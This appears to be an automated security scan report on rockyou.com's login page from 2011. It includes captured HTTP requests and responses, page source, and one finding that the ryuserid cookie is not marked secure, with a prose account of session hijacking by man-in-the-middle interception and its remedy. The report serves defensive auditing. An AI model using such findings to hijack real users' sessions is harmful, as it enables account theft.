<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Date: Mon, 18 Apr 2011 21:53:52 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303163632; expires=Wed, 27-Jul-2011 21:53:52 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11872 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8995
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Cookie Not Marked As Secure
Cookie Not Marked As Secure
1
TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.
Actions to Take
- See the remedy for solution.
- Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
|
- /login/
/login/ CONFIRMED |
Identified Cookie
ryuserid
Request
GET /login/ HTTP/1.1
Referer: http://www.rockyou.com/login/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: lang=pt; lastlogin=1303163721; ctid=2; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/login/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: lang=pt; lastlogin=1303163721; ctid=2; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:55:28 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:55:27 GMT; path=/; domain=.rockyou.com,lastlogin=1303163728; expires=Wed, 27-Jul-2011 21:55:28 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 21:55:28 GMT; path=/; domain=.rockyou.com
X-RyHeader: www164.rockyou.com took D=9663 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<script>
function redir() {
var redirForm = document.getElementById('redirect_form');
if(redirForm != null & redirForm != undefined){
document.getElementById('redirect_form').submit();
}
}
window.onload=redir;
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/login.css.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Ajuda</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<br>
<div style="text-align:center">
<div style="background-color:#DDD;margin:auto;width:730px;padding:15px;">
<script type="text/javascript" language="javascript" src="https://rockyou.com/contents/login/ajax.js"></script>
<script>// Globalsvar isIE6; // Whether the user has ie6. Look for references to it to find IE6 workarounds.var sslHost = "https://" + window.location.hostname; var nonsslHost = "http://" + window.location.hostname; // Show bubble or error on focus, depending on state.function showHelp(inputID) { if (showHelp.curHelpShown != inputID) { if (showHelp.curHelpShown && showHelp.curHelpShown != inputID) document.getElementById(showHelp.curHelpShown+'Help').style.display = 'none'; showHelp.curHelpShown = inputID; var helpDiv = document.getElementById(inputID+'Help'); if (helpDiv) helpDiv.style.display = ''; var inputBubble = document.getElementById(inputID+'Bubble'); if (inputBubble && !inputBubble.innerHTML) generateBubbleEmbed(inputID+'Bubble', 250, 180, 'LT', eval(inputID+'BubbleText')); if (isIE6) if (inputID=='newPW'||inputID=='retype') document.getElementById(inputID+'Help').focus(); }}// Toggle input specified by id to show or not show error statusfunction errorToggle(id, showError, errorText) { if (showError) { document.getElementById(id+'Bubble').style.display = 'none'; document.getElementById(id+'Error').style.display = ''; if (errorText) document.getElementById(id+'Error').innerHTML = errorText; var inputDiv = document.getElementById(id+'Div'); inputDiv.style.color="red"; } else { document.getElementById(id+'Bubble').style.display = ''; document.getElementById(id+'Error').style.display = 'none'; var inputDiv = document.getElementById(id+'Div'); inputDiv.style.color="black"; }}function showLoading(loading) { // Holds publically accessible boolean, whether currently processing a request showLoading.loading = loading; if (loading) { document.getElementById('loadingDiv').style.display = ''; showLoading.hiddenHelp = showHelp.curHelpShown; showHelp(''); } else { document.getElementById('loadingDiv').style.display = 'none'; showHelp(showLoading.hiddenHelp); }}// Used only if skip button availablefunction promptNoSave() { if (confirm("Tem certeza? (Não poderá voltar e editar depois disso!)")) { var destination = ""; destination += (destination.indexOf('?') == -1) ? '?' : '&'; destination += "loginType=skipped"; window.location = destination; }}// -------------- EMAIL FORM FUNCTIONS --------------------// Check if email input is proper format and store result in static emailFormChange variablefunction emailInputValid() { var emailInput = document.getElementById('email'); var reg = /^([\w-]+)(\.[\w-]+)*@([\w\-\.])+\.[A-Za-z]{2,4}$/; emailFormChange.emailIsValid = reg.test(emailInput.value); return emailFormChange.emailIsValid; }// Remove error if the form has gone from invalid to validfunction emailFormChange(event) { if (event && (event.keyCode == 13 || event.which == 13)) { emailFormSubmit(); } else if (!emailFormChange.emailIsValid) { emailFormChange.emailIsValid = emailInputValid(); if (emailFormChange.emailIsValid) errorToggle('email',false); } return false; }// Set form state to invalid and show error if incorrect format. Otherwise submit to check if already registered.function emailFormSubmit() { if (showLoading.loading) return false; var emailInput = document.getElementById('email'); emailFormChange.emailIsValid = emailInputValid(); if (emailFormChange.emailIsValid) { showLoading(true); ajax_post_john(sslHost + '/login/loginProcessor.php', 'stage=checkEmailRegistration&email='+emailInput.value, null, emailFormCallback); } else { // Track failure. Show error. ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-email-submit-failed&value=mainlogin',null,null); errorToggle('email',true); emailInput.focus(); } return false; }function emailFormCallback(responseText) { showLoading(false); eval('var response='+responseText+';'); if (response['error']) { alert(response['error']); ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-email-submit-failed&value=mainlogin',null,null); } else { if (!response['emailRegistered']) { // Check if this email is close but not equal to a common domain name. if (response['possibleTypo']) { var confirmText = 'You may have a typo in your email.\nWe Suggest: '+response['possibleTypo']; confirmText += '\nClick OK to continue or Cancel to re-enter your email.'; // If cancel is pressed, stay on the current page. Otherwise, continue as normal. if (!confirm(confirmText)) { document.getElementById('email').focus(); return; } } // Move to registration form if email cannot be validated. If it can, move to email account validation form. var emailName = ''; document.getElementById('emailContainer').style.display = 'none'; if (emailName = isVerifiableEmail()) { document.getElementById('emailPWContainer').style.display = ''; // Transfer and create data for email password form if (!emailVerificationBubbleText) var emailVerificationBubbleText = '<span class="leftAlign"><span class="headerThree">'+dynLang('Boa vinda, usuário do [EmailType]!', 'EmailType', emailName)+'</span>\n '+dynLang('Por favor, confirme a sua conta entrando a sua senha do seu [EmailType].', 'EmailType', emailName)+ "<br> N∫ao se preocupe, este é o único lugar que você precisa checar se a sua conta existe. Nós não iremos armazenar a sua senha. 